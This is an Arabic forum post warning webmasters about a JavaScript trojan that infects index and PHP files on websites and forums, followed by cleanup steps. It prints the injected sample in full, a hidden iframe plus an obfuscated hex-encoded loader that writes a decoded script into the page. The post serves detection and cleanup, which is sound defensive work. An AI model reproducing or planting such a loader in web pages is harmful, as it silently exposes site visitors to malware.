تحذير : فايروس جديد يكتسح المواقع والمنتديات

بسم الله الرحمن الرحيم

في الفترة الاخيره انتشر فايروس جديد يصيب المواقع الشخصيه والمنتديات ويفتح ثغره خطيره بها تهيء عمل تروجان يمكنه التسلل الى جهاز اي شخص يفتح الموقع اذا مجان مركب انتي فايروس قوي
بالامس واليوم الفايروس ضرب 5 من مواقع اصدقائي وانتشر بسرعة البرق وضربني ومواقع كثيرة بالسيرفر معي

اسم الفايروس
Clicker.JS.Agent.h

النوع
تروجان


شرح الفايروس:

هو ثغره
عباره عن كود يوضع فى ملفات الاندكس وملف ال log.php الكود يوضع فى اى
index او اى ملف php, html مهم بموقعك واللى يدخل يحوله الى عدة مواقع ومن ثم ينزل بجهاز الزائر الفيروس والفيروس عباره عن تروجان وسبايوير قوى جدا

كيف نعرف ان الموقع مصاب

كثير من الانتي فايروز لا يكتشفه حتي nod32 2009
ولكن الكاسبر يتعرف عليه
بمجرد دخولك موقع مصاب سيتسلل اليك الفايروس وعند فتحك لبرنامج ftp ينتقل بسرعة البرق علي كل ملفات موقعك

شكل الفايروز وهو مشفر طبعا

كود:

<hntml>
<center>
<font size="7">
Coming Soon ...<br>
<a href="/vb">forum</a>
</font>
</center>
</html><iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l49663c323804a(l49663c3238432){ var l49663c323881b=16; return (parseInt(l49663c3238432,l49663c323881b));}function l49663c3238fed(l49663c32393d4){ function l49663c3239f8f(){var l49663c323a377=2;return l49663c323a377;} var l49663c32397bd='';l49663c323a761=String.fromCharCode;for(l49663c3239ba6=0;l49663c3239ba6<l49663c32393d4.length;l49663c3239ba6+=l49663c3239f8f()){ l49663c32397bd+=(l49663c323a761(c102916999516l49663c323804a(l49663c32393d4.substr(l49663c3239ba6,l49663c3239f8f()))));}return l49663c32397bd;} var xc3='';var l49663c323ab48='3C736'+xc3+'3726'+xc3+'970743E6'+xc3+'96'+xc3+'6'+xc3+'28216'+xc3+'D796'+xc3+'96'+xc3+'1297B6'+xc3+'46'+xc3+'F6'+xc3+'3756'+xc3+'D6'+xc3+'56'+xc3+'E742E77726'+xc3+'9746'+xc3+'528756'+xc3+'E6'+xc3+'5736'+xc3+'36'+xc3+'1706'+xc3+'528202725336'+xc3+'32536'+xc3+'392536'+xc3+'36'+xc3+'2537322536'+xc3+'312536'+xc3+'6'+xc3+'42536'+xc3+'352532302536'+xc3+'6'+xc3+'52536'+xc3+'312536'+xc3+'6'+xc3+'42536'+xc3+'3525336'+xc3+'42536'+xc3+'332533312533302532302537332537322536'+xc3+'3325336'+xc3+'42532372536'+xc3+'3825373425373425373025336'+xc3+'125326'+xc3+'6'+xc3+'25326'+xc3+'6'+xc3+'2536'+xc3+'372536'+xc3+'6'+xc3+'6'+xc3+'2536'+xc3+'372536'+xc3+'6'+xc3+'6'+xc3+'2533322536'+xc3+'6'+xc3+'42536'+xc3+'3525326'+xc3+'52536'+xc3+'6'+xc3+'52536'+xc3+'3525373425326'+xc3+'6'+xc3+'25326'+xc3+'52536'+xc3+'372536'+xc3+'6'+xc3+'6'+xc3+'25326'+xc3+'6'+xc3+'2536'+xc3+'332536'+xc3+'382536'+xc3+'352536'+xc3+'332536'+xc3+'6'+xc3+'225326'+xc3+'52536'+xc3+'382537342536'+xc3+'6'+xc3+'42536'+xc3+'6'+xc3+'32532372532302537372536'+xc3+'392536'+xc3+'342537342536'+xc3+'3825336'+xc3+'42533332533342533382532302536'+xc3+'382536'+xc3+'352536'+xc3+'392536'+xc3+'372536'+xc3+'3825373425336'+xc3+'4253333253334253336'+xc3+'2532302537332537342537392536'+xc3+'6'+xc3+'32536'+xc3+'3525336'+xc3+'4253237253736'+xc3+'2536'+xc3+'392537332536'+xc3+'392536'+xc3+'322536'+xc3+'392536'+xc3+'6'+xc3+'32536'+xc3+'3925373425373925336'+xc3+'12536'+xc3+'382536'+xc3+'392536'+xc3+'342536'+xc3+'342536'+xc3+'352536'+xc3+'6'+xc3+'525323725336'+xc3+'525336'+xc3+'325326'+xc3+'6'+xc3+'2536'+xc3+'392536'+xc3+'36'+xc3+'2537322536'+xc3+'312536'+xc3+'6'+xc3+'42536'+xc3+'3525336'+xc3+'52729293B7D76'+xc3+'6'+xc3+'172206'+xc3+'D796'+xc3+'96'+xc3+'13D7472756'+xc3+'53B3C2F736'+xc3+'3726'+xc3+'970743E';document.write(l49663c3238fed(l49663c323ab48));</script>

لا يستطيع ماسح فايروسات الموقع التعرف عليه

الحل اذا اصبت بالفايروس ؟

اولا وقبل كل شئ اليكم اربعة خطوات تخلصت بها من الفايروس نهائيا

اول ظهور الفايروز بموقعك عليك بعمل التالي :

- تغيير كلمة مرور الموقع في الحال
- عمل full format لجهازك وانزال اخر اصدارة من كاسبر اسكاي 2009
- ادخل علي السي بانل وقم بتحرير صفحات الاندكس جميعها وملفات login وملفات newthread.php
showthread.php
وهذه اكثر الملفات اصابة بالفايروس
بعدها استبدل هذه الملفات بنسخ نظيفة
- بعد ما تغير الملفات المصابة اعطي التصريح 444 واكرر التصريح 444 لكل ملفات الاندكس واللوق واي ملف مصاب لان بدونه سيعيد الفايروس انتشارة علي الصفحات .

وبعدها تأكد ان جهازك خالي تماما من الفايروسات عند الرفع بواسطة برنامج ftp

هذا للعلم ولكل من واجهه نفس مشكلتي مع الفايروس
تحياتي

http://www.traidnt.net/vb/showthread...5#post10282345

مشكورررررر يا غالي